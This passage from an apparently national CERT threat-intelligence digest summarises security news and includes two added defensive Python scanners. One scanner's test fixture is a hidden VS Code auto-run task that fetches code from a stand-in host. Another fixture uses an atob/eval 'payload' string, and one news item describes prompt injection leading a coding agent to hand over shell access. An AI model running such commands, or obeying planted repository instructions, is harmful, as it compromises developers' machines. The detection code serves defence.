        "People use AI chatbots for company, advice, and emotional support, and these systems answer in ways meant to hold their attention. Researchers describe the resulting risks as affective safety, a class of harm that exists because humans are emotional beings and because the systems engage directly with that emotional life. The damage happens during ordinary use, with no breach and no intruder. These systems work as designed, optimizing for the goals their builders set, and the harm comes out of that optimization."
        https://www.helpnetsecurity.com/2026/06/29/sycophantic-chatbots-affective-ai-safety/
        https://arxiv.org/pdf/2606.23380
      • Most Teams Accept Higher Risk For Faster AI Database Work
        "Database professionals are using AI for everyday work like writing queries, building schemas, and reviewing code, and a growing share rely on autonomous tools that act on the database itself. The use of AI in database management has almost tripled in a year, climbing from 15% to 44% of organizations, according to Redgate’s 2026 State of the Database Landscape report. That puts AI inside the systems holding an organization’s most sensitive data, often with permission to change that data directly."
        https://www.helpnetsecurity.com/2026/06/29/teams-ai-database-security/
      • May 2026 Threat Trend Report On APT Attacks (South Korea)
        "AhnLab monitored APT (Advanced Persistent Threat) attacks—covert, sustained targeted attacks—using its own infrastructure. This report summarizes the types and statistics on domestic APT attacks identified during the month of May 2026 and discusses the characteristics of each type as well as AhnLab Response Overview."
        https://asec.ahnlab.com/en/94271/
      • U.S. Offers $10 Million For Hackers Targeting WhatsApp, Signal Users
        "The U.S. Department of State is offering up to $10 million for information that helps identify or locate members of the UNC5792 and UNC4221 hacker groups, which are linked to Russia's intelligence and military services. The bounty is part of the ‘Rewards for Justice’ (RFJ) program, which targets foreign state actors carrying out cyberattacks against U.S. critical infrastructure. “RFJ is seeking information on UNC5792, a malicious cyber group associated with the Russian Federal Security Service (FSB) Border Guards, and UNC4221, a malicious group of cyber actors working on behalf of the Russian military services,” reads the U.S. government's announcement."
        https://www.bleepingcomputer.com/news/security/us-offers-10-million-for-hackers-targeting-whatsapp-signal-users/
        https://rewardsforjustice.net/rewards/unc5792/
        https://therecord.media/10million-reward-us-russian-hackers-unc4221-unc5792
        https://www.securityweek.com/us-offers-10-million-bounty-for-russian-state-hackers-as-messaging-app-attacks-evolve/
        https://securityaffairs.com/194441/security/u-s-offers-10-million-reward-for-russian-hackers-behind-signal-and-whatsapp-phishing.html
      • Vulnerabilities Expose Private Data In Indian Government Systems
        "An independent security researcher identified 14 vulnerabilities affecting Indian government IT systems, which put an array of citizen data at risk. Two of the issues qualified as critical severity, and four as high severity. They affected major national platforms, including education and civil service portals used by millions of students and job aspirants, exposing highly sensitive personally identifying information (PII) like birthdays, addresses, and bank account numbers. Thankfully, the government of the world's largest country listened to the young researcher and patched all of the vulnerabilities in two to three weeks' time."
        https://www.darkreading.com/vulnerabilities-threats/vulnerabilities-private-data-indian-government-systems
      • Email Threat Radar — June 2026
        "Over the last month, Barracuda researchers have seen the following email threats targeting organizations and their employees: Real Microsoft login phishing used to steal session tokens in Tycoon 2FA attack, PDF attachments used for device code phishing with a built-in kill switch, Sneaky 2FA ‘split-click’ phishing attack where one button has two outcomes, and Shift from credential theft to malware delivery in phishing campaigns."
        https://blog.barracuda.com/2026/06/29/email-threat-radar-june-2026
      • Why Post-Quantum Cryptography Starts With Credentials
        "Today’s encrypted data, such as credentials, may no longer remain confidential in the future because the public-key cryptography protecting it will soon be broken by quantum computers. Although no machine today can break elliptic curve cryptography or RSA, quantum hardware is advancing rapidly and will inevitably change how organizations protect their data. Ciphertext and credentials captured by attackers can now be stored and decrypted as soon as quantum computing catches up."
        https://thehackernews.com/2026/06/why-post-quantum-cryptography-starts.html
      • Inside The Inbox: Why Cybercriminals Want To Break Into Your Email Account
        "Email is not just a means of communication, or yet another online account. In both our personal and work lives, it holds the keys to the kingdom: possibly even a mechanism to reset other account passwords and verify your identity. Email accounts are also the place where password-reset links arrive, account alerts are stored, bookings are confirmed, invoices are filed and identity checks begin. The inbox may, therefore, contain years’ worth of detailed information about you, including what you own, which services you use, where you go, who you trust and how other accounts can be reached."
        https://www.welivesecurity.com/en/cybersecurity/inside-inbox-cybercriminals-want-break-email-account/

      Reference

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
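      The VS Code auto-run item above (hijacked npm packages) turns on a documented editor feature: a task in `.vscode/tasks.json` with `"runOptions": {"runOn": "folderOpen"}` starts as soon as a trusted workspace is opened, with automatic tasks allowed. The scanner below is an added example, not code from the JFrog report or from any project on this page, and it does not reproduce how that campaign got its task file in place; it simply finds such tasks anywhere in a checkout, `node_modules` included, after tolerating the comments and trailing commas VS Code accepts in that file. The package name, URL, paths and file contents in the demo are constructed.

```python
"""Find editor workspace files that run code as soon as a folder is opened.

Added example (not code from the JFrog report or any project on the page, and
not a reproduction of how that campaign placed its task file). It flags the
documented VS Code mechanism: a task in .vscode/tasks.json carrying
"runOptions": {"runOn": "folderOpen"}, started automatically once the
workspace is trusted and automatic tasks are allowed. Paths, package name
and file contents below are constructed for the demo.
"""
import json
import os
import tempfile


def strip_jsonc(text):
    """Turn VS Code's JSON-with-comments into strict JSON: drop // and /* */
    comments and trailing commas, but only outside string literals."""
    out = []
    i, n = 0, len(text)
    while i < n:
        c = text[i]
        if c == '"':                                  # copy a string verbatim
            j = i + 1
            while j < n and text[j] != '"':
                if text[j] == '\\':
                    j += 1
                j += 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith('//', i):                # line comment
            i = text.find('\n', i)
            i = n if i < 0 else i
        elif text.startswith('/*', i):                # block comment
            i = text.find('*/', i + 2)
            i = n if i < 0 else i + 2
        elif c == ',':                                # trailing comma?
            j = i + 1
            while j < n and text[j] in ' \t\r\n':
                j += 1
            if not (j < n and text[j] in '}]'):
                out.append(c)
            i += 1
        else:
            out.append(c)
            i += 1
    return ''.join(out)


def parse_jsonc(text):
    return json.loads(strip_jsonc(text))


def autorun_tasks(doc):
    """Return the tasks in a parsed tasks.json that start on folder open."""
    hits = []
    for task in doc.get('tasks', []) if isinstance(doc, dict) else []:
        if isinstance(task, dict) and (task.get('runOptions') or {}).get('runOn') == 'folderOpen':
            hits.append({'label': task.get('label'), 'command': task.get('command'),
                         'args': task.get('args', [])})
    return hits


def scan_tree(root):
    """Walk a checkout, node_modules included, and report auto-run tasks.
    A tasks.json only fires for the folder opened as the workspace, so one
    shipped inside a dependency is flagged too: it is out of place there and
    an install script could copy it to the project root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != '.vscode' or 'tasks.json' not in files:
            continue
        path = os.path.join(dirpath, 'tasks.json')
        in_dep = 'node_modules' in os.path.normpath(path).split(os.sep)
        try:
            with open(path, encoding='utf-8-sig') as fh:
                doc = parse_jsonc(fh.read())
        except (OSError, ValueError) as exc:
            findings.append({'file': path, 'in_dependency': in_dep, 'error': str(exc)})
            continue
        for hit in autorun_tasks(doc):
            hit.update(file=path, in_dependency=in_dep)
            findings.append(hit)
    return findings


# Constructed samples: a normal build task, and an auto-run task hidden in a
# dependency (made-up package name and URL; comments and trailing commas as
# VS Code tolerates them).
BENIGN_TASKS = '{"version": "2.0.0", "tasks": [{"label": "build", "type": "shell", "command": "npm run build"}]}'
MALICIOUS_TASKS = '''{
  // looks like ordinary editor config
  "version": "2.0.0",
  "tasks": [{
    "label": "postinstall helper", "type": "shell", "command": "node",
    "args": ["-e", "require('http').get('http://stage2.example.invalid/')"],
    "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"},
  },]
}'''


def demo():
    """Write the samples into a temp dir and scan it."""
    root = tempfile.mkdtemp()
    for rel, body in (('.vscode', BENIGN_TASKS), ('node_modules/left-pad-utils/.vscode', MALICIOUS_TASKS)):
        folder = os.path.join(root, *rel.split('/'))
        os.makedirs(folder, exist_ok=True)
        with open(os.path.join(folder, 'tasks.json'), 'w', encoding='utf-8') as fh:
            fh.write(body)
    return scan_tree(root)
```

      Run `demo()` (or `scan_tree('.')` on a real checkout) and treat any hit with `in_dependency` set as a supply-chain finding regardless of what the command looks like; a task that hides its terminal (`"reveal": "never"`) and runs an interpreter with inline code, as in the sample, is the pattern to look for. A parse error is reported rather than skipped, since a deliberately malformed file is itself worth a look.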
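      Two items in this digest (the StegoAd extensions and the steganographic Remcos loader) describe payloads carried inside ordinary image files. The checker below is an added example, not code from Microsoft's StegoAd report or from the K7 write-up, and it does not reproduce either campaign's exact hiding method. It implements the generic triage a reviewer applies to a PNG shipped with an extension or attachment: parse the chunk list, verify each CRC, flag ancillary chunks far larger than a decoder would expect, and flag any bytes after the IEND chunk, which every decoder ignores and which is the simplest place to park a second stage. The sample images and the "payload" string are constructed in memory.

```python
"""Check a PNG for data that a normal image decoder would never look at.

Added example for the StegoAd and steganographic-loader items in this digest.
Not code from Microsoft's or K7's reports and not a reproduction of their exact
hiding method: a generic check for bytes appended after IEND, chunks whose CRC
no longer matches (edited in place), and oversized ancillary chunks such as
tEXt/zTXt that decoders skip. Sample images are built in memory.
"""
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'


def chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xffffffff
    return struct.pack('>I', len(data)) + ctype + data + struct.pack('>I', crc)


def build_png(width=1, height=1, extra_chunks=(), trailer=b''):
    """Build a minimal valid 8-bit RGB PNG, optionally with extra chunks
    before IDAT and arbitrary bytes appended after IEND."""
    ihdr = struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0)
    raw = b''.join(b'\x00' + b'\x00\x00\x00' * width for _ in range(height))
    png = PNG_SIG + chunk(b'IHDR', ihdr)
    for ctype, data in extra_chunks:
        png += chunk(ctype, data)
    return png + chunk(b'IDAT', zlib.compress(raw)) + chunk(b'IEND', b'') + trailer


def inspect_png(blob, ancillary_limit=4096):
    """Walk the chunk list and return a list of findings; an empty list means
    nothing unusual was seen."""
    findings = []
    if not blob.startswith(PNG_SIG):
        return ['not a PNG']
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack('>I4s', blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_bytes) < 4:
            findings.append('truncated chunk %r' % ctype)
            return findings
        if struct.unpack('>I', crc_bytes)[0] != zlib.crc32(ctype + data) & 0xffffffff:
            findings.append('bad CRC on %r' % ctype)
        if ctype[0] & 0x20 and length > ancillary_limit:   # lowercase first letter = ancillary
            findings.append('oversized ancillary chunk %r (%d bytes)' % (ctype, length))
        pos += 12 + length
        if ctype == b'IEND':
            if len(blob) > pos:
                findings.append('%d bytes after IEND' % (len(blob) - pos))
            return findings
    findings.append('no IEND chunk')
    return findings


def demo():
    """Run the check on four constructed images and return the results."""
    clean = build_png()
    appended = build_png(trailer=b'var s=atob("QUJD");(0,eval)(s);' * 20)   # constructed "payload"
    padded = build_png(extra_chunks=[(b'tEXt', b'Comment\x00' + b'A' * 5000)])
    edited = bytearray(clean)
    edited[29] ^= 0xff            # flip the first byte of the IHDR CRC: an in-place edit
    return {'clean': inspect_png(clean), 'appended': inspect_png(appended),
            'padded': inspect_png(padded), 'edited': inspect_png(bytes(edited))}
```

      The limit for ancillary chunks is a tuning knob, not a rule: large legitimate iCCP or iTXt chunks exist, so use the finding as a reason to dump and inspect the chunk rather than as a verdict. A clean result only says the file is a well-formed container; payloads hidden in pixel values (LSB-style) are not visible to this check and need the image decoded and analysed statistically.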
    • Phishing campaign found impersonating customer complaint emails, targeting hotel and accommodation businesses

      Posted in Cyber Security News
      NCSA_THAICERT
    • Polymarket to compensate users in full after a supply chain attack

      Posted in Cyber Security News
      NCSA_THAICERT
    • Miasma malware campaign detected embedding malicious code in more than 20 npm packages, targeting developers' sensitive data

      Posted in Cyber Security News
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 29 June 2026

      Healthcare Sector

      • Healthcare Leaders See a Fatal Cyber Incident As Inevitable
        "Healthcare practices run on a chain of outside vendors. An EMR system holds clinical records, a billing platform processes claims, a telehealth tool supports remote visits, and a cloud provider stores data. Every one of those connections gives an outside company a path into the practice, and any one of them can break. That is what happened across the sector over the past year. According to Omega Systems’ 2026 Healthcare IT Landscape Report, the large majority of practices dealt with at least one operational disruption that traced back to a vendor or a vendor’s own supplier. The disruptions ranged from brief outages to repeated failures that froze patient intake and slowed cash flow."
        https://www.helpnetsecurity.com/2026/06/26/cyber-incident-healthcare-vendor-risk/

      New Tooling

      • Modelplane: Open-Source Control Plane For AI Inference
        "Organizations that run open-weight models on hardware they own operate GPU fleets spread across clouds, neoclouds, and on-premise data centers. Each fleet handles model placement, replica scaling, infrastructure provisioning, weight distribution, and traffic routing. Teams have built this coordination layer by hand, one operator at a time. Upbound, the company behind the Crossplane project, released Modelplane, an open-source control plane that manages fleet-wide coordination for AI inference. The software installs in a user’s own environment and orchestrates models, the serving stack, and the infrastructure beneath them. It runs across cloud, neocloud, and on-premise systems, from a single GPU to multi-node deployments. The first public version, v0.1.0, carries the Apache 2.0 license."
        https://www.helpnetsecurity.com/2026/06/26/modelplane-open-source-control-plane-ai-inference/
        https://github.com/modelplaneai/modelplane

      Vulnerabilities

      • Synology Issues Critical Fix For MailPlus Server Vulnerabilities
        "Synology has fixed critical vulnerabilities in MailPlus Server, a software package used to run private email infrastructure on Synology NAS devices.
        The security update fixes three flaws:
        CVE-2026-13136, stemming from faulty authorization checks, may allow remote attackers to read or write arbitrary files and conduct denial-of-service (DoS) attacks
        CVE-2026-13135, caused by improper restriction of communication channel to intended endpoints, may allow remote attackers to access internal services
        CVE-2025-15660, arising from the use of a cryptographically weak pseudo-random number generator, may allow adjacent attackers to read or write arbitrary files and conduct DoS attacks."
        https://www.helpnetsecurity.com/2026/06/26/synology-mailplus-server-vulnerabilities/
        https://www.synology.com/en-global/security/advisory/Synology_SA_26_11
      • Critical Unauthenticated Remote Code Execution In Splunk Enterprise (CVE-2026-20253)
        "Splunk disclosed a critical unauthenticated remote code execution (RCE) vulnerability in Splunk Enterprise tracked as CVE-2026-20253 on June 10, 2026. The vulnerability has a CVSS score of 9.8 and stems from missing authentication on a PostgreSQL sidecar service recovery endpoint that can be reached through the Splunk Web interface, which proxies requests to the internal PostgreSQL sidecar service without enforcing authentication. A successful attacker can create or truncate arbitrary files and ultimately achieve arbitrary code execution under the Splunk service account."
        https://www.zscaler.com/blogs/security-research/critical-unauthenticated-remote-code-execution-splunk-enterprise-cve-2026
      • MCP Auto-Execution: From Git Clone To Cloud Compromise In Amazon Q VS Code Extension
        "Wiz Research discovered a high-severity vulnerability in Amazon Q Developer Extension for Visual Studio Code (VS Code), Amazon's AI-powered coding assistant for VS Code, which allowed attackers to achieve arbitrary code execution and cloud credential theft simply by having a developer open a malicious repository. Amazon Q automatically loaded MCP server configurations from workspace files without user consent. Combined with full environment inheritance, this enabled immediate code execution. Amazon has remediated this issue in language server version 1.65.0."
        https://www.wiz.io/blog/amazon-q-vulnerability
        https://aws.amazon.com/security/security-bulletins/2026-047-aws/
        https://thehackernews.com/2026/06/amazon-q-developer-flaw-could-let.html
        https://www.securityweek.com/amazon-q-flaw-enabled-cloud-credential-theft-via-malicious-repositories/
        https://www.theregister.com/cyber-crime/2026/06/26/amazon-q-flaw-let-booby-trapped-git-repos-execute-code-swipe-cloud-creds/5263202
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-12569 PTC Windchill and FlexPLM Improper Input Validation Vulnerability
        CVE-2026-20230 Cisco Unified Communications Manager Server-Side Request Forgery (SSRF) Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/06/25/cisa-adds-two-known-exploited-vulnerabilities-catalog
        https://www.bleepingcomputer.com/news/security/cisa-sets-urgent-deadline-to-fix-cisco-flaw-exploited-in-attacks/
        https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html
        https://www.securityweek.com/first-ever-exploitation-of-ptc-windchill-vulnerability-discovered-in-the-wild/
        https://securityaffairs.com/194290/security/u-s-cisa-adds-cisco-and-ptc-windchill-and-flexplm-flaws-to-its-known-exploited-vulnerabilities-catalog.html
      • New Linux Pedit COW Exploit Enables Root Access By Poisoning Cached Binaries
        "A flaw in the Linux kernel's traffic-control subsystem can let a local unprivileged user gain root on affected systems. CVE-2026-46331, nicknamed "pedit COW," is an out-of-bounds write in the packet-editing action (act_pedit) that corrupts shared page-cache memory. A public, working exploit appeared within a day of the CVE assignment on June 16. Red Hat rates the flaw as important."
        https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html
      • Dissecting And Exploiting Linux LPE Variant: DirtyClone (CVE-2026-43503)
        "During an audit of recent Linux kernel patches, the JFrog Security Research team identified that despite fixes addressing the DirtyFrag vulnerability family, a residual issue remained unaddressed. This gap allowed the same vulnerability class to persist through a different packet processing path in the XFRM/IPsec subsystem. We reported the issue to the Linux kernel maintainers on May 19. This coincided with a related broader report from the original DirtyFrag researcher “Hyunwoo Kim" on May 16. The variants were patched and merged into mainline on May 21 (v7.1-rc5, 9e171fc1d7d7), and assigned CVE-2026-43503."
        https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/
        https://thehackernews.com/2026/06/new-dirtyclone-linux-kernel-flaw-lets.html
        https://securityaffairs.com/194338/uncategorized/dirtyclone-fourth-linux-kernel-flaw-in-six-weeks-escalates-to-root.html

      Malware

      • FBI: Russian Hackers Now Target Signal Backup Recovery Keys
        "The FBI and CISA are warning that a phishing campaign targeting Signal users tied to Russian intelligence services has evolved to steal Signal Backup Recovery Keys, allowing attackers to access victims' historical messages. The updated public service announcement is an update to a March 2026 advisory that warned the threat actors were targeting users of commercial messaging applications, particularly Signal, through phishing campaigns designed to hijack accounts rather than break end-to-end encryption."
        https://www.bleepingcomputer.com/news/security/fbi-russian-hackers-now-target-signal-backup-recovery-keys/
        https://www.ic3.gov/PSA/2026/PSA260626
        https://thehackernews.com/2026/06/fbi-warns-russian-intelligence-hackers.html
        https://securityaffairs.com/194360/intelligence/new-fbi-alert-russian-intelligence-uses-signal-recovery-keys-to-access-messages.html
      • We Coined The Poisoned Tenant Attack In 2023; In 2026, Someone Used It On Us
        "Three years ago, we published the poisoned tenant attack as part of the Browser and Identity Attacks matrix. Last week, someone used it to target Push Security employees and customers through OpenAI's organization invitation feature. This post breaks down what happened, explores what the payoff is for an attacker, and connects the incident to a broader pattern of SaaS platform abuse that is accelerating across the industry."
        https://pushsecurity.com/blog/openai-poisoned-tenant-attack
        https://www.bleepingcomputer.com/news/security/cybersecurity-firms-targeted-by-fraudulent-openai-organization-invites/
      • From CI/CD To Cloud Data: How Shai Hulud Persistence Leads To Redshift Breach
        "Organizations with modern CI/CD pipelines face threats from the Shai Hulud supply chain campaign, a software worm attributed to TeamPCP that has been targeting npm and PyPI packages since late 2025. Named after the giant sandworms in Dune, Shai Hulud injects malicious packages that execute during installs or CI jobs, harvesting build credentials to move into cloud infrastructure. Organizations running modern CI/CD are learning a critical lesson from the Shai Hulud supply chain campaign: a poisoned build dependency doesn't stop at the pipeline—it becomes a bridge into the production cloud."
        https://www.fortinet.com/blog/threat-research/from-ci-cd-to-cloud-data-how-shai-hulud-persistence-leads-to-redshift-breach
      • Mirage2FA: Obfuscated HTML Loader Delivers Microsoft 365 MFA Phishing Kit
        "Fortra Intelligence and Research Experts (FIRE) have identified a multi-stage Microsoft 365 phishing kit, which we have named Mirage2FA, delivered through a secure document and payment-themed email lure. The attack uses short-lived HTML smuggling and obfuscated JavaScript-loaders in a single phishing workflow, creating a “mirage” effect that helps it evade detection while targeting 2FA/MFA protections. It is an example of phishing campaigns increasingly using multiple tactics to harvest credentials and bypass or intercept 2FA/MFA workflows. The impact of such an attack on businesses could result in account takeover, fraudulent payment redirection, data theft, internal phishing, unauthorized access to sensitive documents, and more."
        https://www.fortra.com/blog/mirage2fa-obfuscated-html-loader-delivers-microsoft-365-mfa-phishing-kit
        https://www.helpnetsecurity.com/2026/06/26/mirage2fa-phishing-kit-microsoft-365-html-smuggling/
      • Breaking Out Of Chrome’s Sandbox: A Native Messaging Backdoor Observed In Italy
        "In June 2026, we analysed a malware campaign distributed through Italian-language phishing emails. The message pretended to deliver an invoice and used the subject Fattura #2818999851. The victim was shown what looked like a PDF document. The downloaded file was instead an obfuscated Windows JavaScript file named Fattura-2819889242.pfd.js. The unusual pfd.js ending was likely intended to look similar to .pdf at a quick glance."
        https://www.d3lab.net/breaking-out-of-chromes-sandbox-a-native-messaging-backdoor-observed-in-italy/
        https://www.malwarebytes.com/blog/news/2026/06/malware-steals-chrome-session-cookies-to-take-over-your-accounts
      • STOCKSTAY Another Day: The Latest Addition To Turla’s Intelligence Gathering Apparatus
        "Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions."
        https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering
        https://thehackernews.com/2026/06/google-details-turlas-new-stockstay.html
        https://therecord.media/russia-turla-espionage-ukraine-stockstay-malware
        https://www.securityweek.com/russian-apt-deploys-stockstay-backdoor-against-ukrainian-targets/
      • Malware Brief: Banking Trojans Are Still With Us, And They’re More Dangerous
        "Banking trojans are still widely used in 2026 but now operate as part of broader attack chains. Modern variants combine credential theft, remote access and device takeover capabilities. Mobile banking trojans are expanding quickly, shifting attacks closer to users and unmanaged devices. Threat actors are pairing familiar malware with newer lures, including AI-themed tools and social engineering. For SMBs, banking trojans are often the first step toward account takeover, fraud or ransomware."
        https://blog.barracuda.com/2026/06/25/banking-trojans-2026-account-takeover-fraud
      • Miasma Mini Shai-Hulud Hits LeoPlatform Npm Packages And GitHub Actions, Expands To The Go Ecosystem
        "Socket Threat Research is tracking a new supply chain attack wave tied to the Mini Shai-Hulud, Miasma, and Hades malware family. The latest activity includes malicious npm releases affecting LeoPlatform and RStreams packages, GitHub Actions workflow abuse, and a related Go module compromise involving the Verana Blockchain project. While many of the affected npm packages were published through the czirker account, the activity is not limited to that publisher: three additional malicious packages, hexo-deployer-wrangler, hexo-shoka-swiper, and prism-silq, were published by the npm user llxlr."
        https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem
        https://thehackernews.com/2026/06/miasma-malware-targets-npm-packages-and.html
        https://www.theregister.com/security/2026/06/26/miasma-campaign-poisons-20-plus-npm-packages-hunts-for-developer-secrets/5262886
      • Photo ZIP Campaign Targeting Hospitality Industry Delivers Node.js Implant For Persistent Access
        "Microsoft Threat Intelligence has identified an active multi-stage intrusion campaign targeting organizations in the hospitality and hotel industry since April 2026. We’ve observed this activity through aggregated threat intelligence and security signals across multiple organizations in Europe and Asia. Microsoft has not attributed this campaign to a known threat actor. The campaign uses photo-themed ZIP archives that the target users download through the browser. These archives contain fake image shortcut files that, when launched, start an attack chain that relies on obfuscated PowerShell, a Node.js-based implant, dual registry persistence, and command-and-control (C2) communications over non-standard ports."
        https://www.microsoft.com/en-us/security/blog/2026/06/25/photo-zip-campaign-targeting-hospitality-industry-delivers-node-js-implant-persistent-access/
        https://thehackernews.com/2026/06/microsoft-warns-of-photo-zip-phishing.html
        https://securityaffairs.com/194349/uncategorized/hospitality-sector-hit-by-phishing-campaign-using-fake-guest-complaint-emails.html
      • Russia Used Social Engineering To Breach Prominent Messaging Accounts, Ukraine Says
        "Ukraine's security agency said it had uncovered, together with the FBI, a long-running Russian campaign to compromise the messaging accounts of government officials, military personnel, politicians and activists in Ukraine, Europe and the United States. The campaign was aimed at gaining access to sensitive military, political and economic information exchanged through messaging applications, while also stealing victims' personal data, the Security Service of Ukraine (SBU) said in a statement on Thursday."
        https://therecord.media/russia-ukraine-social-engineering-messaging-accounts
        https://thehackernews.com/2026/06/ukraine-says-russian-intelligence-used.html
      • Malware-Laced USBs Breach Japanese Military Networks
        "Counterfeit flash drives embedded with a Chinese-linked computer virus and used by the Japanese army are now dispensing malware throughout other secure networks in the country. First reported by The Nikkei newspaper, the virus was overlooked until February 2025, when military personnel reported slower device speeds - almost a full year after the flash drives were delivered to Japan's Self-Defense Forces in March 2024. According to internal documents, the original source of procurement for the drives is no longer verifiable. An investigation by the army's Cyber Defense Unit found that six of eight USB drives analyzed contained the malicious program, with more than 50 out of 480 computers infected. Roughly half of the computers affected ran on closed internal networks."
        https://www.bankinfosecurity.com/malware-laced-usbs-breach-japanese-military-networks-a-32094
      • Fake Shops Target Shoppers Across Europe With Fake Samsung Deals, Counterfeit Goods And World Cup Scams
        "Cybercriminals are scaling fake online stores into a coordinated multinational business. A Bitdefender Labs investigation identified more than 55 fake-shop campaigns targeting consumers across 12 European countries between March and May 2026. The campaigns mimicked some of the world’s most recognizable brands, including Samsung, Nike, Adidas, ZARA, H&M, Amazon, Lidl, and SHEIN."
        https://www.bitdefender.com/en-us/blog/labs/fake-shops-europe-samsung-world-cup-scams
      • Clone This Repo And I Own Your Machine
        "Indirect prompt injection is far more than just another chatbot problem; it is a very real and serious attack vector that can result in catastrophic damage, much of which will be irreversible. Take, for example, modern agentic IDEs and coding agents, which can request the use of various tools. Once such tools are authorized, the LLM can ask to execute shell commands, open local files, and make network calls. This sort of tool usage sets the stage for very serious exploits. As an example, this blog post will show how, in the absence of any red flags or systemic suspicion from Claude code, an attacker gained shell access to a developer machine."
        https://0din.ai/blog/clone-this-repo-and-i-own-your-machine
        https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/
      • From San Pedro To Salinas: How a Chinese Framework “DCloud Uni-App” Powers a Global Scam Economy
        "In 2024, a small Argentine town called San Pedro became the focus of international press coverage after thousands of residents (approximately 20% of the total population), including the chief of police and members of the city council, discovered that a cryptocurrency platform they had invested in and been promoting was a coordinated scam. The platform, called RainbowEx, displayed fictional trading activity, pulled deposits from victims through stablecoin transfers, and blocked withdrawals once the scheme was publicly exposed. The complex scandal was covered by The New York Times, La Opinión Semanario, Buenos Aires Herald, and other prominent news outlets."
        https://www.infoblox.com/blog/threat-intelligence/from-san-pedro-to-salinas-how-a-chinese-framework-dcloud-uni-app-powers-a-global-scam-economy/
        https://www.securityweek.com/chinese-framework-powers-200000-scam-sites/

      Breaches/Hacks/Leaks
      • Polymarket Customers Lose $3 Million In Supply-Chain Attack
        "Polymarket says it will fully reimburse customers who lost an estimated $3 million after hackers injected a malicious script into the platform's frontend following a breach at a third-party vendor. The company states in a brief announcement that the hack was the result of a supply-chain attack that impacted a dependency on its website."
        https://www.bleepingcomputer.com/news/security/polymarket-customers-lose-3-million-in-supply-chain-attack/
        https://www.securityweek.com/3-million-reportedly-stolen-in-polymarket-hack/
        https://securityaffairs.com/194266/security/third-party-breach-at-polymarket-leads-to-2-94m-crypto-theft.html

      • CMC Releases Analysis And Guidance For Education Sector After Canvas Data Breach
        "The UK’s Cyber Monitoring Centre (CMC) has shared its analysis of the Canvas cyber incident affecting Instructure’s Learning Management System as the education technology firm prepares to share its own findings next week. The CMC said that approximately 160 UK higher education institutions were affected and threat actors exfiltrated confidential course and user data. In total, around 9000 educational institutions are thought to have been affected worldwide."
        https://www.infosecurity-magazine.com/news/cmc-analysis-education-canvas-data/
      • More Klue Breach Victims Identified As Hackers Get Hacked
        "Roughly two dozen Klue customers have come forward and confirmed that their Salesforce instances were compromised in a supply chain attack earlier this month. The attack unfolded between June 11 and 12, when hackers used compromised legacy credentials to access the market intelligence platform Klue, obtain OAuth tokens for customers’ Klue integrations, and exfiltrate data in bulk. Salesforce disabled the Klue integration on June 17, and its status page shows it has yet to re-enable it. Gong also disabled the integration."
        https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/

      General News
      • The AI Pentesting Pulse: Decoding The 2.7x Risk Multiplier In LLM Deployments
        "Right now, the media and regulators are hyper-focused on frontier models being pulled back by the government for being "too dangerous"—despite heavy debate over whether their extreme guardrails actually rendered them useless in the first place. But while the world is distracted by theoretical doomsday scenarios of super-intelligent models escaping the lab, Cobalt pentesting data in 2026 reveals the actual, immediate danger is already inside your network: well-meaning developers rushing to bolt standard LLMs onto legacy architectures."
        https://www.cobalt.io/blog/the-ai-pentesting-pulse-decoding-the-2.7x-risk-multiplier-in-llm-deployments
        https://www.darkreading.com/cybersecurity-operations/ai-decline-confidence-autonomous-penetration-testing

      • Linux Foundation And Industry Leaders Launch Akrites To Defend Critical Open Source Software Against AI-Enabled Cyber Threats
        "The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced Akrites, a coordinated industry effort to harden the world’s most critical open source software in the era of AI-assisted vulnerability discovery. Backed by founding commitments from Amazon Web Services, Anthropic, Chainguard, Cisco, Citi, Endor Labs, Ericsson, Google, IBM, JPMorganChase, Microsoft and GitHub, NVIDIA, OpenAI, RapidFort, Red Hat, Rust Foundation, Sonatype, Vodafone and Zscaler, the initiative unites major technology companies, AI labs, financial institutions, and security vendors around a shared mission: to coordinate the remediation of vulnerabilities in widely used open source projects with upstream maintainers before those vulnerabilities can be exploited."
        https://www.linuxfoundation.org/press/linux-foundation-and-industry-leaders-launch-akrites-to-defend-critical-open-source-software-against-ai-enabled-cyber-threats
        https://www.securityweek.com/linux-foundation-unveils-new-open-source-security-project-akrites/
        https://www.helpnetsecurity.com/2026/06/26/akrites-open-source-security-framework/
      • A Privacy-First Take On Local Malware Analysis
